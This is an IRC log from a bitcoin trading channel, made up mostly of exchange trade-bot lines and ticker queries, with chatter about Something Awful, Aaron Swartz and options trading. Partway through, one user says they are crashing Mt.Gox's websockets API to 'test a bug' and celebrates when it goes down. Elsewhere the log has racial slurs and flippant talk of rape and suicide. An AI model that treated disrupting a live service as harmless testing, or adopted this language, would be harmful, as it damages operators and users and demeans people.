17:34:59 Rating entry successful. Your rating of 2 for user mircea_popescu has been recorded. Feb 09 17:35:02 what is SA! Feb 09 17:35:04 t want to be involved in their googleads cesspool Feb 09 17:35:08 d3 i also remeber when SA was not around Feb 09 17:35:09 truffles: something awful Feb 09 17:35:10 have you seen the sort of shit they advertise ? Feb 09 17:35:24 truffles: there are two major communities on the internet Feb 09 17:35:29 something awful and reddit Feb 09 17:35:33 iv not been to Sa for over 10 years other than the off link related to btc Feb 09 17:35:34 and theres a LOT of overlap between the two Feb 09 17:35:35 [MPEX] [S.MPOE] 54371 @ 0.0006584 = 35.7979 BTC [+] Feb 09 17:35:48 Diablo-D3 i dunno about that dood. they were trying to impress me with their size, it boiled down to 100k historical accts and 3k active. Feb 09 17:35:53 oh thats the actual name lol Feb 09 17:35:58 i was like... ooookay ? this is not enough to run 2011 bitcoin. Feb 09 17:36:04 it's like a bad wow knockoff server. Feb 09 17:36:10 if a game can have teams/clans that can have thousands of people Feb 09 17:36:18 theres a SA team/clan and a reddit one Feb 09 17:36:23 usually goons and test Feb 09 17:36:40 mircea_popescu: SA sorta died out Feb 09 17:36:44 funny the founder of SA was not even that active 13 years ago... but i guess he still takes checks Feb 09 17:36:58 it used to be a lot more active Feb 09 17:37:04 then reddit sorta raped everybody Feb 09 17:37:08 yeah the only thing i heard of SA in the last 10 years is they troll bitcoin Feb 09 17:37:13 lol raped Feb 09 17:37:18 I have no fucking clue how reddit became so fucking popular Feb 09 17:37:20 its not any good Feb 09 17:37:26 its like if 4chan was a forum. Feb 09 17:37:31 Diablo-D3 prolly spazz friendly. Feb 09 17:37:36 mircea_popescu: thats the thing Feb 09 17:37:47 i never reddit, but the guy anherroed for a good cause, now even anon has his back Feb 09 17:37:50 early shit was all mature intelligent conversations Feb 09 17:38:02 Chaang-Noi: he didnt an hero Feb 09 17:38:07 who ? Feb 09 17:38:12 d3 govt killed him? Feb 09 17:38:14 mircea_popescu: aaron swartz Feb 09 17:38:18 mp is clueless? Feb 09 17:38:18 ive been to the not so nice place in 4chan once Feb 09 17:38:19 Chaang-Noi: in around about way, yes Feb 09 17:38:21 a. well... it'd qualify neh ? Feb 09 17:38:24 he did off himself. Feb 09 17:38:32 mp has not seen the vide of anaon that made the us govt call for 5000 cyber cops? Feb 09 17:38:34 they hounded him until he committed suicide Feb 09 17:38:55 they threatened him with the rest of his life in supermax and all sorts of other bullshit stuff Feb 09 17:39:05 he got killed by suicide Feb 09 17:39:05 why do you think everyone wants those two fucks from the DoJ fired? Feb 09 17:39:08 nice weekend dip huh? Feb 09 17:39:57 it dipped ? Feb 09 17:40:02 http://www.michaeleisen.org/blog/?p=1282 Feb 09 17:40:22 mp whats my hourly troll gonna be Feb 09 17:40:29 truffles your huh ? Feb 09 17:40:41 i think im ready Feb 09 17:41:22 [MPEX] [O.BTCUSD.P200T] 615 @ 0.05558649 = 34.1857 BTC [-] Feb 09 17:41:22 was being sarcastic Feb 09 17:41:27 new 52 week high Feb 09 17:41:37 $24 by monday i think Feb 09 17:41:52 by monday you mean today? Feb 09 17:42:40 shhheit Feb 09 17:42:44 I keep buying put Feb 09 17:42:45 puts Feb 09 17:43:14 mp out with the fine print Feb 09 17:43:26 oops Feb 09 17:43:29 mp got those puts Feb 09 17:43:37 my bids were down Feb 09 17:44:53 looks like they were sold tho neh ? Feb 09 17:45:50 yeah Feb 09 17:45:52 good price Feb 09 17:45:56 23.61 Feb 09 17:45:56 for u Feb 09 17:46:01 yo, watch out, i might crash the mtgox websockets api in a minute Feb 09 17:46:14 testing a bug Feb 09 17:46:29 thats what its called now Feb 09 17:47:31 [MPEX] [S.MPOE] 629 @ 0.0006584 = 0.4141 BTC [+] Feb 09 17:47:35 [MPEX] [S.MPOE] 4321 @ 0.00065529 = 2.8315 BTC [-] Feb 09 17:48:45 ;;ticker Feb 09 17:48:46 BTCUSD ticker | Best bid: 23.58001, Best ask: 23.59990, Bid-ask spread: 0.01989, Last trade: 23.58001, 24 hour volume: 39946.91403850, 24 hour low: 22.25000, 24 hour high: 23.61000, 24 hour vwap: 22.85655 Feb 09 17:50:01 [MPEX] [S.MPOE] 13700 @ 0.00065513 = 8.9753 BTC [-] Feb 09 17:50:43 [MPEX] [S.MPOE] 3299 @ 0.00065513 = 2.1613 BTC [-] Feb 09 17:51:33 [MPEX] [S.MPOE] 8151 @ 0.00065491 = 5.3382 BTC [-] Feb 09 17:51:35 [MPEX] [S.MPOE] 7499 @ 0.00065517 = 4.9131 BTC [+] Feb 09 17:53:31 [MPEX] [S.MPOE] 8451 @ 0.00065517 = 5.5368 BTC [+] Feb 09 17:54:05 i dont see how the volume can hold over the weekend Feb 09 17:54:16 we'll see tho Feb 09 17:54:17 40k ? why not ? Feb 09 17:54:40 [MPEX] [S.MPOE] 1000 @ 0.00065285 = 0.6529 BTC [-] Feb 09 17:54:43 [MPEX] [S.MPOE] 50000 @ 0.00065284 = 32.642 BTC [-] Feb 09 17:54:45 [MPEX] [S.MPOE] 13259 @ 0.00065283 = 8.6559 BTC [-] Feb 09 17:54:46 [MPEX] [S.MPOE] 16950 @ 0.00065062 = 11.028 BTC [-] Feb 09 17:54:48 [MPEX] [S.MPOE] 15051 @ 0.00064951 = 9.7758 BTC [-] Feb 09 17:54:58 maybe some people put money in Feb 09 17:55:07 and wait for the dump on the weekend Feb 09 17:55:12 to buy it cheaper Feb 09 17:55:20 i thought the weekend dip was over? Feb 09 17:55:42 it was happening lately Feb 09 17:55:54 but obv not today Feb 09 17:56:35 lol Feb 09 17:56:40 mwahaha Feb 09 17:56:41 funny Feb 09 17:56:53 gox websockets down Feb 09 17:56:54 win Feb 09 17:58:59 o srsly ? Feb 09 17:59:05 wd. gimme exclusive of the story ? :D Feb 09 17:59:37 gesell ^ Feb 09 18:00:07 [MPEX] [S.MPOE] 1000 @ 0.00064952 = 0.6495 BTC [+] Feb 09 18:00:09 [MPEX] [S.MPOE] 4949 @ 0.00064951 = 3.2144 BTC [-] Feb 09 18:00:12 [MPEX] [S.MPOE] 17050 @ 0.0006494 = 11.0723 BTC [-] Feb 09 18:00:14 [MPEX] [S.MPOE] 22900 @ 0.00064897 = 14.8614 BTC [-] Feb 09 18:00:15 [MPEX] [S.MPOE] 8100 @ 0.00064864 = 5.254 BTC [-] Feb 09 18:00:17 [MPEX] [S.MPOE] 10536 @ 0.00064793 = 6.8266 BTC [-] Feb 09 18:02:31 yeah still testing it but seemed to for for a minute. Feb 09 18:03:03 would be nothing more than a denial of service Feb 09 18:03:18 i c Feb 09 18:05:01 [MPEX] [S.MPOE] 4321 @ 0.00066003 = 2.852 BTC [+] Feb 09 18:05:09 [MPEX] [S.MPOE] 4029 @ 0.00066037 = 2.6606 BTC [+] Feb 09 18:05:17 " Most goons have no idea what Buttcoins are." lol Feb 09 18:06:45 :) Feb 09 18:11:55 [MPEX] [S.MPOE] 16800 @ 0.00066037 = 11.0942 BTC [+] Feb 09 18:12:34 i confess this idea turned out really entertaining Feb 09 18:12:36 [MPEX] [S.MPOE] 7471 @ 0.00066037 = 4.9336 BTC [+] Feb 09 18:12:38 [MPEX] [S.MPOE] 3000 @ 0.00067606 = 2.0282 BTC [+] Feb 09 18:12:39 [MPEX] [S.MPOE] 2579 @ 0.00067612 = 1.7437 BTC [+] Feb 09 18:13:22 "Mircea is undoubtedly overcharging for SA accounts and making money off the suckers. Man's not stupid you know. So more power to him." Feb 09 18:13:34 where the heck i got that reputation from, what am i, the modern day scot ? Feb 09 18:14:21 are your fees market rate? Feb 09 18:15:17 [MPEX] [S.MPOE] 4321 @ 0.00064919 = 2.8051 BTC [-] Feb 09 18:15:19 [MPEX] [S.MPOE] 3119 @ 0.00064913 = 2.0246 BTC [-] Feb 09 18:15:20 [MPEX] [S.MPOE] 34300 @ 0.00064912 = 22.2648 BTC [-] Feb 09 18:15:21 what fees, what market ? Feb 09 18:15:22 [MPEX] [S.MPOE] 8164 @ 0.00064793 = 5.2897 BTC [-] Feb 09 18:15:27 [MPEX] [S.MPOE] 21053 @ 0.0006461 = 13.6023 BTC [-] Feb 09 18:15:28 [MPEX] [S.MPOE] 5800 @ 0.00064398 = 3.7351 BTC [-] Feb 09 18:15:47 u know that 30btc is that standard Feb 09 18:16:18 o. mpex is afaik the only bitcoin-anything with a membership fee Feb 09 18:16:24 (tho the foundatiojn copied it later on) Feb 09 18:17:40 [MPEX] [S.MPOE] 3700 @ 0.00064383 = 2.3822 BTC [-] Feb 09 18:18:37 interesting ive not heard of SA or bitcoins before Feb 09 18:18:52 before last yr Feb 09 18:18:59 both groups seem very similar to me Feb 09 18:19:02 new stuff all around! Feb 09 18:19:10 ironically, they are rather similar. Feb 09 18:19:55 [BTCTC] [GSDPT] 5 @ 0.0061 = 0.0305 BTC [+] Feb 09 18:19:57 [BTCTC] [GSDPT] 5 @ 0.0061 = 0.0305 BTC [+] Feb 09 18:20:45 bitcoin foundation has a membership fee :P Feb 09 18:21:21 yeah Feb 09 18:21:26 I've been out of this room. any news on s.dice dumps? Feb 09 18:21:40 oh you want me to dump some? hold on Feb 09 18:21:48 :) Feb 09 18:21:55 so mp basically is market leader Feb 09 18:22:12 aiball: Erik said no more sales for a while Feb 09 18:22:22 thanks Feb 09 18:23:59 aiball and then the block sold out Feb 09 18:24:14 You sell SA accounts?!? Feb 09 18:24:20 no ? Feb 09 18:24:34 "Mircea is undoubtedly overcharging for SA accounts"... Feb 09 18:24:53 knotwork http://trilema.com/2013/the-trolling-something-awful-competition/ Feb 09 18:24:55 see there. Feb 09 18:26:08 [MPEX] [S.MPOE] 19000 @ 0.0006433 = 12.2227 BTC [-] Feb 09 18:28:01 [MPEX] [S.MPOE] 9598 @ 0.00064241 = 6.1659 BTC [-] Feb 09 18:28:07 [MPEX] [S.MPOE] 1398 @ 0.00064137 = 0.8966 BTC [-] Feb 09 18:29:45 [MPEX] [S.MPOE] 3100 @ 0.00064271 = 1.9924 BTC [+] Feb 09 18:30:24 [MPEX] [S.MPOE] 5169 @ 0.00064137 = 3.3152 BTC [-] Feb 09 18:30:30 [MPEX] [S.MPOE] 4831 @ 0.00064002 = 3.0919 BTC [-] Feb 09 18:32:30 mircea_popescu is more like the Dr. Dre of the bitcoin world Feb 09 18:33:18 fun fact: after dr. dre got rich, nigga's in compton kept jumping him cause they were haters Feb 09 18:34:38 [MPEX] [S.MPOE] 7800 @ 0.00064271 = 5.0131 BTC [+] Feb 09 18:34:40 [MPEX] [S.MPOE] 16900 @ 0.00064383 = 10.8807 BTC [+] Feb 09 18:35:02 dr dre is rather grummpy i hear Feb 09 18:35:14 Hmm so paying people 10 bitcoins and their SA account is overcharging? Sounds about right, I am not very tempted to go join that place for such a paltry sum Feb 09 18:35:47 some people are really into this whole trolling thing. Feb 09 18:36:32 oh trolling can be fun, sure, but from all I have heard of SA trolling them would just be pointless stooping to ridiculously low level Feb 09 18:36:39 as they say, "trolling is a art" Feb 09 18:36:50 not there, from what I have heard Feb 09 18:37:04 pearls before swine for a troll artist Feb 09 18:43:30 [MPEX] [S.MPOE] 11850 @ 0.00064002 = 7.5842 BTC [-] Feb 09 18:45:54 [MPEX] [S.MPOE] 33319 @ 0.00064002 = 21.3248 BTC [-] Feb 09 18:45:55 [MPEX] [S.MPOE] 2237 @ 0.00064 = 1.4317 BTC [-] Feb 09 18:46:28 anyone know of a source for connected node count ? Feb 09 18:48:15 [MPEX] [S.MPOE] 13400 @ 0.00064383 = 8.6273 BTC [+] Feb 09 18:48:17 [MPEX] [S.MPOE] 8700 @ 0.00064856 = 5.6425 BTC [+] Feb 09 18:48:18 [MPEX] [S.MPOE] 350 @ 0.00065686 = 0.2299 BTC [+] Feb 09 18:51:34 no Feb 09 19:01:30 mircea_popescu is the mpex deposit address offline? Feb 09 19:01:35 or is it connected to nodes? Feb 09 19:03:31 http://bitcoinstatus.rowit.co.uk/ sadly, is outdated Feb 09 19:05:31 20k ish aha Feb 09 19:05:36 for some reason i recalled 30-40k Feb 09 19:05:40 i guess im even more outdated. Feb 09 19:13:31 [MPEX] [S.MPOE] 14950 @ 0.00064 = 9.568 BTC [-] Feb 09 19:14:27 [MPEX] [S.MPOE] 9300 @ 0.00064 = 5.952 BTC [-] Feb 09 19:16:02 http://polimedia.us/dtng/c/src/13604274825.png Feb 09 19:16:05 actually this is pretty lulzy. Feb 09 19:18:26 [MPEX] [S.MPOE] 3513 @ 0.00064 = 2.2483 BTC [-] Feb 09 19:18:28 [MPEX] [S.MPOE] 25300 @ 0.00063978 = 16.1864 BTC [-] Feb 09 19:18:35 [MPEX] [S.MPOE] 1487 @ 0.00063873 = 0.9498 BTC [-] Feb 09 19:20:01 mircea_popescu: oh man Feb 09 19:20:03 why is there a haboo hotel advert? Feb 09 19:20:13 thestringpuller: because SA sold out, nigga Feb 09 19:20:19 the sa trolling is progressing i guess. Feb 09 19:21:05 meanwhile back at the other farm of stupidity, https://bitcointalk.org/index.php?topic=142083.msg1514331#msg1514331 Feb 09 19:21:58 I love how no one asks my opinion the GPL thing Feb 09 19:22:13 seeing as my copyright is buried somewhere in cgminer Feb 09 19:24:13 Diablo, what is your opinion on the GPL thing? Feb 09 19:24:43 I think its fucking hilarious that anyone gives three shits Feb 09 19:25:08 like what happens if their worst nightmare is true? Feb 09 19:25:14 nothing right? Feb 09 19:25:28 they could get sued in internet court. Feb 09 19:25:38 mircea_popescu: actually worse Feb 09 19:25:41 23.70 Feb 09 19:25:48 which may have all sorts of impredictable results, such as louisiana being returned to the french Feb 09 19:25:49 con OR me could have their units halted at the boarder and confiscated Feb 09 19:25:57 just takes a court order. Feb 09 19:26:05 dang Feb 09 19:26:09 im still betting on louisiana being returned to the french. Feb 09 19:26:59 o look, it's the whale rider Feb 09 19:27:28 lol Feb 09 19:27:59 I hope that becomes my nickname Feb 09 19:28:45 Erik WR Voorhees ? Feb 09 19:28:48 not so bad yeah. Feb 09 19:30:43 [MPEX] [S.MPOE] 5000 @ 0.00065653 = 3.2827 BTC [+] Feb 09 19:30:45 [MPEX] [S.MPOE] 200 @ 0.00065654 = 0.1313 BTC [+] Feb 09 19:31:41 [MPEX] [S.MPOE] 4121 @ 0.00065654 = 2.7056 BTC [+] Feb 09 19:31:43 [MPEX] [S.MPOE] 16709 @ 0.00065657 = 10.9706 BTC [+] Feb 09 19:42:52 [BTCTC] [S.BBET-PT] 100 @ 0.002 = 0.2 BTC [+] Feb 09 19:45:24 [MPEX] [S.MPOE] 5000 @ 0.00065656 = 3.2828 BTC [-] Feb 09 19:45:26 [MPEX] [S.MPOE] 17391 @ 0.00065657 = 11.4184 BTC [+] Feb 09 19:45:27 [MPEX] [S.MPOE] 19800 @ 0.00065686 = 13.0058 BTC [+] Feb 09 19:45:29 [MPEX] [S.MPOE] 20650 @ 0.00065981 = 13.6251 BTC [+] Feb 09 19:45:30 [MPEX] [S.MPOE] 5000 @ 0.00066261 = 3.3131 BTC [+] Feb 09 19:45:34 [MPEX] [S.MPOE] 12859 @ 0.00066262 = 8.5206 BTC [+] Feb 09 19:54:54 [MPEX] [S.MPOE] 4321 @ 0.00065098 = 2.8129 BTC [-] Feb 09 19:54:56 [MPEX] [S.MPOE] 20350 @ 0.00065097 = 13.2472 BTC [-] Feb 09 19:54:57 [MPEX] [S.MPOE] 3979 @ 0.00064252 = 2.5566 BTC [-] Feb 09 19:57:31 [BTCTC] [S.MPOE-PT] 200 @ 0.0007 = 0.14 BTC Feb 09 20:04:44 [MPEX] [S.MPOE] 4484 @ 0.00065354 = 2.9305 BTC [+] Feb 09 20:13:01 [MPEX] [S.MPOE] 4321 @ 0.00066121 = 2.8571 BTC [+] Feb 09 20:13:02 [MPEX] [S.MPOE] 9365 @ 0.00066122 = 6.1923 BTC [+] Feb 09 20:18:47 [BTCTC] [SYNERGY] 1 @ 0.0809 BTC [+] Feb 09 20:24:00 [MPEX] [S.MPOE] 4321 @ 0.0006606 = 2.8545 BTC [-] Feb 09 20:24:01 [MPEX] [S.MPOE] 25800 @ 0.0006605 = 17.0409 BTC [-] Feb 09 20:24:08 [MPEX] [S.MPOE] 5429 @ 0.00065354 = 3.5481 BTC [-] Feb 09 20:28:39 [HAVELOCK] [SDICE] 3 @ 0.6678 = 2.0034 BTC [-] Feb 09 20:28:41 [HAVELOCK] [SDICE] 7 @ 0.66799999 = 4.676 BTC [+] Feb 09 20:28:42 [HAVELOCK] [SDICE] 71 @ 0.668 = 47.428 BTC [+] Feb 09 20:29:39 [HAVELOCK] [SDICE] 1 @ 0.668 BTC [+] Feb 09 20:30:33 [MPEX] [S.MPOE] 4321 @ 0.00066121 = 2.8571 BTC [+] Feb 09 20:30:35 [MPEX] [S.MPOE] 879 @ 0.00066122 = 0.5812 BTC [+] Feb 09 20:35:20 [MPEX] [S.MPOE] 8556 @ 0.00066122 = 5.6574 BTC [+] Feb 09 20:36:39 [MPEX] [S.MPOE] 7650 @ 0.00066244 = 5.0677 BTC [+] Feb 09 20:42:08 [MPEX] [S.MPOE] 5000 @ 0.00066261 = 3.3131 BTC [+] Feb 09 20:42:10 [MPEX] [S.MPOE] 12251 @ 0.00066262 = 8.1178 BTC [+] Feb 09 20:48:43 [MPEX] [S.MPOE] 5094 @ 0.00066244 = 3.3745 BTC [-] Feb 09 20:54:39 [MPEX] [S.MPOE] 6206 @ 0.00065868 = 4.0878 BTC [-] Feb 09 21:04:57 [MPEX] [S.MPOE] 394 @ 0.00066235 = 0.261 BTC [+] Feb 09 21:04:59 [MPEX] [S.MPOE] 4321 @ 0.00065355 = 2.824 BTC [-] Feb 09 21:05:00 [MPEX] [S.MPOE] 2224 @ 0.00065355 = 1.4535 BTC [-] Feb 09 21:13:36 [MPEX] [S.MPOE] 2835 @ 0.00065355 = 1.8528 BTC [-] Feb 09 21:13:38 [MPEX] [S.MPOE] 14453 @ 0.00065354 = 9.4456 BTC [-] Feb 09 21:13:42 [MPEX] [S.MPOE] 2262 @ 0.00064786 = 1.4655 BTC [-] Feb 09 21:14:40 [BTCTC] [B.YABMC] 8 @ 0.0249 = 0.1992 BTC [+] Feb 09 21:20:22 [MPEX] [S.MPOE] 17700 @ 0.00065086 = 11.5202 BTC [+] Feb 09 21:20:23 [MPEX] [S.MPOE] 436 @ 0.00064787 = 0.2825 BTC [-] Feb 09 21:20:30 [MPEX] [S.MPOE] 6769 @ 0.00064786 = 4.3854 BTC [-] Feb 09 21:50:11 [MPEX] [S.MPOE] 24766 @ 0.00064786 = 16.0449 BTC [-] Feb 09 21:55:14 ;;ticker Feb 09 21:55:14 BTCUSD ticker | Best bid: 23.55001, Best ask: 23.60000, Bid-ask spread: 0.04999, Last trade: 23.55001, 24 hour volume: 36605.15164711, 24 hour low: 22.31600, 24 hour high: 23.71000, 24 hour vwap: 23.00973 Feb 09 21:55:31 hey hey! Feb 09 21:58:30 [MPEX] [S.MPOE] 19850 @ 0.00064786 = 12.86 BTC [-] Feb 09 22:00:58 [MPEX] [S.MPOE] 4321 @ 0.00065739 = 2.8406 BTC [+] Feb 09 22:01:00 [MPEX] [S.MPOE] 13779 @ 0.00065748 = 9.0594 BTC [+] Feb 09 22:07:55 [BTCTC] [COGNITIVE] 1 @ 0.33 BTC [-] Feb 09 22:08:27 [BTCTC] [BASIC-MINING] 1 @ 0.3498 BTC [+] Feb 09 22:11:54 [MPEX] [S.MPOE] 4321 @ 0.00064805 = 2.8002 BTC [-] Feb 09 22:11:56 [MPEX] [S.MPOE] 25679 @ 0.00064786 = 16.6364 BTC [-] Feb 09 22:17:38 [HAVELOCK] [SDICE] 12 @ 0.668 = 8.016 BTC [+] Feb 09 22:22:43 [BTCTC] [GSDPT] 1 @ 0.0061 BTC [+] Feb 09 22:26:29 [BTCTC] [GSDPT] 46 @ 0.0061 = 0.2806 BTC [+] Feb 09 22:37:12 ;;asks 25 Feb 09 22:37:14 There are currently 12296.932 bitcoins offered at or under 25.0 USD, worth 300575.660329 USD in total. Feb 09 22:37:15 ;;bids 22 Feb 09 22:37:17 There are currently 14233.261 bitcoins demanded at or over 22.0 USD, worth 322475.208869 USD in total. Feb 09 22:37:57 ;;ticker Feb 09 22:37:58 BTCUSD ticker | Best bid: 23.70002, Best ask: 23.73997, Bid-ask spread: 0.03995, Last trade: 23.73997, 24 hour volume: 35637.61381320, 24 hour low: 22.51000, 24 hour high: 23.73998, 24 hour vwap: 23.04446 Feb 09 22:38:52 ;;asks 30 Feb 09 22:38:53 There are currently 21657.638 bitcoins offered at or under 30.0 USD, worth 561371.737071 USD in total. Feb 09 22:42:44 [MPEX] [S.MPOE] 500 @ 0.00065713 = 0.3286 BTC [+] Feb 09 22:42:46 [MPEX] [S.MPOE] 4321 @ 0.00065714 = 2.8395 BTC [+] Feb 09 22:42:47 [MPEX] [S.MPOE] 10471 @ 0.00065748 = 6.8845 BTC [+] Feb 09 22:42:48 [MPEX] [S.MPOE] 5000 @ 0.00065931 = 3.2966 BTC [+] Feb 09 22:42:50 [MPEX] [S.MPOE] 13600 @ 0.00065932 = 8.9668 BTC [+] Feb 09 22:42:51 [MPEX] [S.MPOE] 14108 @ 0.00066063 = 9.3202 BTC [+] Feb 09 22:44:26 !ticker mpex s.dkice Feb 09 22:44:28 Are you sure you have no tobacco? Feb 09 22:44:29 !ticker mpex s.dice Feb 09 22:44:30 [MPEX:S.DICE] 1D: 0.00559977 / 0.00619659 / 0.0064 (1132469 shares, 7,017.46 BTC), 7D: 0.0042 / 0.00582233 / 0.007395 (4599540 shares, 26,780.05 BTC), 30D: 0.00085848 / 0.00550228 / 0.0075 (8894277 shares, 48,938.87 BTC) Feb 09 22:44:32 assbot stfu Feb 09 23:00:27 [MPEX] [S.MPOE] 1701 @ 0.00066062 = 1.1237 BTC [-] Feb 09 23:00:34 [MPEX] [S.MPOE] 6042 @ 0.00066063 = 3.9915 BTC [+] Feb 09 23:00:35 [MPEX] [S.MPOE] 7657 @ 0.00066091 = 5.0606 BTC [+] Feb 09 23:02:35 [MPEX] [S.MPOE] 2800 @ 0.00065629 = 1.8376 BTC [-] Feb 09 23:02:36 [MPEX] [S.MPOE] 550 @ 0.00065097 = 0.358 BTC [-] Feb 09 23:02:38 [MPEX] [S.MPOE] 4321 @ 0.00065096 = 2.8128 BTC [-] Feb 09 23:02:45 [MPEX] [S.MPOE] 11810 @ 0.00065093 = 7.6875 BTC [-] Feb 09 23:02:47 [MPEX] [S.MPOE] 2874 @ 0.00064786 = 1.8619 BTC [-] Feb 09 23:02:49 [MPEX] [S.MPOE] 5000 @ 0.00064728 = 3.2364 BTC [-] Feb 09 23:02:50 [MPEX] [S.MPOE] 2645 @ 0.00064727 = 1.712 BTC [-] Feb 09 23:18:24 !ticker m S.MPOE Feb 09 23:18:25 [MPEX:S.MPOE] 1D: 0.00063873 / 0.000678 / 0.0007 (6049679 shares, 4,101.73 BTC), 7D: 0.00063873 / 0.00068556 / 0.0007 (19789271 shares, 13,566.78 BTC), 30D: 0.00059445 / 0.00066597 / 0.0007 (67815686 shares, 45,163.63 BTC) Feb 09 23:21:37 [BTCTC] [BASIC-MINING] 1 @ 0.3498 BTC [+] Feb 09 23:26:32 Anyone has BBET for sale at a reasonable price? Feb 09 23:30:21 [MPEX] [S.MPOE] 1769 @ 0.00064728 = 1.145 BTC [+] Feb 09 23:30:23 [MPEX] [S.MPOE] 17331 @ 0.00064727 = 11.2178 BTC [-] Feb 09 23:36:05 ;;ticker Feb 09 23:36:05 BTCUSD ticker | Best bid: 23.82511, Best ask: 23.85000, Bid-ask spread: 0.02489, Last trade: 23.85000, 24 hour volume: 36908.25562531, 24 hour low: 22.52533, 24 hour high: 23.98961, 24 hour vwap: 23.13240 Feb 09 23:36:21 mtgoxlive says 23.99 :P Feb 09 23:36:27 [BTCTC] [COGNITIVE] 1 @ 0.325 BTC [-] Feb 09 23:38:18 short form Feb 09 23:38:52 [BTCTC] [GSDPT] 50 @ 0.0061 = 0.305 BTC [+] Feb 09 23:41:29 [MPEX] [S.MPOE] 5585 @ 0.00064727 = 3.615 BTC [-] Feb 09 23:45:54 [BTCTC] [GSDPT] 450 @ 0.0061 = 2.745 BTC [+] Feb 09 23:46:21 [MPEX] [S.MPOE] 29199 @ 0.00064765 = 18.9107 BTC [+] Feb 09 23:46:22 [MPEX] [S.MPOE] 1842 @ 0.00064727 = 1.1923 BTC [-] Feb 09 23:46:23 [MPEX] [S.MPOE] 37700 @ 0.00064653 = 24.3742 BTC [-] Feb 09 23:46:27 [MPEX] [S.MPOE] 859 @ 0.00064537 = 0.5544 BTC [-] Feb 09 23:46:37 [BTCTC] [COGNITIVE] 4 @ 0.33 = 1.32 BTC [+] Feb 09 23:48:06 [BTCTC] [S.MPOE-PT] 296 @ 0.0007 = 0.2072 BTC Feb 09 23:48:08 sooo... 25 ? Feb 09 23:48:17 [MPEX] [S.MPOE] 25400 @ 0.00064979 = 16.5047 BTC [+] Feb 09 23:48:27 yeah, feels like it. Feb 09 23:51:18 35... beat the previous high Feb 09 23:52:07 [MPEX] [S.MPOE] 4321 @ 0.00065487 = 2.8297 BTC [+] Feb 09 23:52:08 [MPEX] [S.MPOE] 2405 @ 0.00064979 = 1.5627 BTC [-] Feb 09 23:52:10 [MPEX] [S.MPOE] 28822 @ 0.00065488 = 18.875 BTC [+] Feb 09 23:52:10 [MPEX] [S.MPOE] 1500 @ 0.00066058 = 0.9909 BTC [+] Feb 09 23:52:12 [MPEX] [S.MPOE] 550 @ 0.00066059 = 0.3633 BTC [+] Feb 09 23:52:14 [MPEX] [S.MPOE] 5000 @ 0.0006609 = 3.3045 BTC [+] Feb 09 23:52:15 [MPEX] [S.MPOE] 35124 @ 0.00066091 = 23.2138 BTC [+] Feb 09 23:58:21 well Feb 09 23:58:36 my calls are looking pretty good right now Feb 09 23:59:03 yup, must be Feb 09 23:59:21 I sold some though on the dump below 19 Feb 09 23:59:23 oh well Feb 10 00:01:17 eh Feb 10 00:01:37 small balls Feb 10 00:02:02 You said yesterday you were waiting for your spreadsheet to update? Feb 10 00:02:26 You got an auto-updating one? Feb 10 00:04:34 yah Feb 10 00:04:45 not the holdings Feb 10 00:04:50 the asset values Feb 10 00:05:01 =ImportHtml("mpex.co","table",2) Feb 10 00:05:10 then read off that page Feb 10 00:05:13 for example Feb 10 00:05:49 yeah, I've released my tools on the forum Feb 10 00:07:02 You could even get the spreadsheet to show your options excersising price. Feb 10 00:07:17 If not done already Feb 10 00:13:14 [MPEX] [S.MPOE] 4321 @ 0.00064543 = 2.7889 BTC [-] Feb 10 00:13:16 [MPEX] [S.MPOE] 9041 @ 0.00064537 = 5.8348 BTC [-] Feb 10 00:13:17 [MPEX] [S.MPOE] 9450 @ 0.00064508 = 6.096 BTC [-] Feb 10 00:13:19 [MPEX] [S.MPOE] 7288 @ 0.00064447 = 4.6969 BTC [-] Feb 10 00:14:11 what was MPOE dividend per share most recently? Feb 10 00:15:10 0.00002 I think, or near that. Almost as much as SDICE Feb 10 00:16:19 I couldnt quite figure it out from the prospectus Feb 10 00:16:39 so there are 100mil paying shares? Feb 10 00:17:11 500mil Feb 10 00:17:20 500 million? Feb 10 00:17:27 then it's less Feb 10 00:17:30 yes Feb 10 00:17:33 its much less Feb 10 00:17:46 it shows 2531.17 BTC total dividend last month Feb 10 00:17:49 yesh Feb 10 00:18:02 ;;calc 2531/500000000/.0006 Feb 10 00:18:03 0.00843666666667 Feb 10 00:18:08 0.84% Feb 10 00:20:16 Namworld: yes the options value is calculated both at mid market and as exercise in two separate columns Feb 10 00:20:31 cool Feb 10 00:21:29 [MPEX] [S.MPOE] 13412 @ 0.00064447 = 8.6436 BTC [-] Feb 10 00:21:34 [MPEX] [S.MPOE] 6764 @ 0.00064372 = 4.3541 BTC [-] Feb 10 00:22:35 sold some CoinBr.iDiff-O for 0.07 -> diff over 7 million at March 20? Feb 10 00:23:11 time to improve their hedge on bitbet :D Feb 10 00:26:07 [BTCTC] [GSDPT] 100 @ 0.006 = 0.6 BTC [-] Feb 10 00:28:09 and iDiff-E (Feb 20) has spread 0.032 - 0.049 ...we've got quite a forecast now Feb 10 00:28:15 ;;bc,diff Feb 10 00:28:15 3275464.5865656 Feb 10 00:29:44 ;;bc,diffchange Feb 10 00:29:46 Estimated percent change in difficulty this period | 2.75124889803 % based on data since last change | 2.47239535291 % based on data for last three days Feb 10 00:35:00 Moved iDiff-E (Feb 20) lowest ask to 0.039 - only 100 available! Feb 10 00:37:24 [BTCTC] [RSM] 33 @ 0.0098 = 0.3234 BTC [-] Feb 10 00:38:20 yawb Feb 10 00:38:25 hows the bear slaughter going on Feb 10 00:38:31 [BTCTC] [RSM] 68 @ 0.0099 = 0.6732 BTC [+] Feb 10 00:42:57 Yes, this is dog: http://imgur.com/a/pL5PH Feb 10 00:46:47 [MPEX] [S.MPOE] 9300 @ 0.00064374 = 5.9868 BTC [+] Feb 10 00:46:49 [MPEX] [S.MPOE] 1530 @ 0.00064373 = 0.9849 BTC [-] Feb 10 00:46:51 [MPEX] [S.MPOE] 7036 @ 0.00064372 = 4.5292 BTC [-] Feb 10 00:46:52 [MPEX] [S.MPOE] 1119 @ 0.00064252 = 0.719 BTC [-] Feb 10 00:46:53 [MPEX] [S.MPOE] 8565 @ 0.00064218 = 5.5003 BTC [-] Feb 10 01:06:50 [BTCTC] [GSDPT] 1 @ 0.006 BTC [-] Feb 10 01:08:04 5 bonus coupons for BTC-BOND Feb 10 01:08:10 incoming Feb 10 01:09:55 [MPEX] [S.MPOE] 6235 @ 0.00064218 = 4.004 BTC [-] Feb 10 01:09:57 [MPEX] [S.MPOE] 23617 @ 0.00064182 = 15.1579 BTC [-] Feb 10 01:09:58 [MPEX] [S.MPOE] 15550 @ 0.0006392 = 9.9396 BTC [-] Feb 10 01:10:00 [MPEX] [S.MPOE] 18067 @ 0.00063881 = 